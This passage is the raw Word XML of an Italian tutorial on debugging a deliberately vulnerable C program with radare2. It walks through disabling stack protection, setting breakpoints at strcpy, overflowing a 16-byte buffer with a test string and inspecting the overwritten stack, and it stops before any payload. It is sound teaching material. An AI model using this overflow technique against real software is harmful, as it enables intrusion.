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574EE" w14:textId="607515F9" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduzione a Radare2 e Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6533A97F" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Radare2:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t> È un framework di reverse engineering, analisi di malware e debugging potente e open-source. È noto per la sua flessibilità e per essere un "coltello svizzero" per gli esperti di sicurezza.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA6194" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Buffer Overflow:</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t> È una vulnerabilità che si verifica quando un programma scrive dati oltre la dimensione del buffer allocato in memoria. Questo può portare a sovrascrivere dati cruciali come l'indirizzo di ritorno delle funzioni, consentendo di prendere il controllo del flusso di esecuzione (e quindi del programma stesso).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657E2894" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tutorial: Debugging </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation di un Buffer Overflow con Radare2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E7B059" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:t>Useremo un semplice esempio di programma vulnerabile per dimostrare i concetti. Supponiamo di avere un file chiamato </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t> (puoi compilarlo tu stesso o usarne uno che ti viene fornito). Il codice C potrebbe essere simile a questo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593833AE" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13034C19" wp14:editId="324AA6CB">
            <wp:extent cx="2963112" cy="3406140"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="213311461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14610" name="Immagine 1" descr="Immagine che contiene test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372" cy="341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7864" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B3AB62" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34ED326C" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5A4E9A" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C1D47A3" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26CB3472" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2963C433" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A3EEBE3" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B819349" w14:textId="736A90B9" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Passo 1: Preparazione</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D2BC23" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compilare il programma (se necessario):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7099110F" wp14:editId="39EA886B">
            <wp:extent cx="3158535" cy="1074420"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1414455259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55259" name="Immagine 1" descr="Immagine che contiene testo, Carattere, scherma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022" cy="107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C28E" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> -o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_program.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>fno-stack-protector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> -no-pie -m32  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E17530" w14:textId="66AF4279" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>fno-stack-protector</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">: Disabilita le protezioni dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> (utile per i primi test di overflow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B599DA9" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:t>-no-pie: Disabilita l'</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Space Layout </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Randomization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> (ASLR) per il codice del programma (rende gli indirizzi di memoria prevedibili)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2802338A" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:t>-m32: Compila per architettura a 32 bit (opzionale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027889EC" w14:textId="40F35B6A" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aprire il programma con Radare2:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">radare2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5FE952D0" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passo 2: Esplorare l'eseguibile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3E43D2" w14:textId="71639DB8" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analizzare il programma:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x00001050]&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>aa  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Analizza tutto il programma</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x00001050]&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>afl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> # Mostra le funzioni trovate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Dovresti vedere tra le funzioni main e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C217794" w14:textId="6D2B6B58" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disassemblare la funzione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vuln_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x00001050]&gt; pdf @ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> # Disassembla la funzione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Analizza il codice. Dovresti notare che la funzione usa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t> su un buffer limitato (16 byte).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7CCE0F" w14:textId="312DE792" w:rsidR="007B05B5" w:rsidRPr="004A07AA" w:rsidRDefault="007B05B5" w:rsidP="007B05B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Controllare l’intero stato della memoria:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x00001050]&gt; </w:t>
      </w:r>
      <w:r>
        <w:t>V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5527E" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="007B05B5" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passo 3: Impostare il Debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666E71F8" w14:textId="22BE68F6" w:rsidR="004A07AA" w:rsidRPr="007B05B5" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Entrare nel modo debug:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x00001050]&gt; r2 -d </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>program</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Avvia radare2 in modalità debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361716D1" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impostare un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73585401" w14:textId="5E2EC4F0" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Usa l'indirizzo dell'istruzione </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t> all'interno di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>vuln_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">, che hai visto nel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>disassembly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>. Di solito, è all'inizio della funzione.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x....]&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>indirizzo_strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>&gt;  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Imposta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>breakpoint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> all'indirizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20AC41CC" w14:textId="00548BD8" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eseguire il programma con un input di test:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x....]&gt; dc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>aaaabbbbccccddddeeeeffffgggghhhh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Continua l'esecuzione e passa una stringa di input</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:br/>
        <w:t>(Cerca di usare una stringa che sia chiaramente più lunga di 16 byte)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15405C44" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B64FE9D" w14:textId="3AEC45D9" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passo 4: Analizzare l'Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D81A0F4" w14:textId="4D99A72A" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Visualizzare i registri:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">0x....]&gt; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>dr  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Mostra i registri</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t>Verifica lo stato dei registri, in particolare, osserva il registro </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t> (su architetture a 32 bit) o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>rip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t> (su architetture a 64 bit).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6BEB6B" w14:textId="6BD3776E" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Visualizzare lo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">[0x....]&gt; px 64 @ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>esp  #</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> Mostra i contenuti dello </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> (64 byte)Cerca nel buffer </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve"> (all'indirizzo di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t> esp), vedrai la stringa di input, e se la stringa era abbastanza lunga, vedrai i bytes "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>aaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>bbbb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>cccc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t xml:space="preserve">", ecc., che hanno sovrascritto indirizzi sullo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004A07AA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA61D8" w14:textId="1D9D1CF0" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:r w:rsidRPr="004A07AA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Passo 5: Identificare l'Indirizzo di Ritorno Sovrascritto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51186FD6" w14:textId="77777777" w:rsidR="004A07AA" w:rsidRPr="004A07AA" w:rsidRDefault="004A07AA" w:rsidP="004A07AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
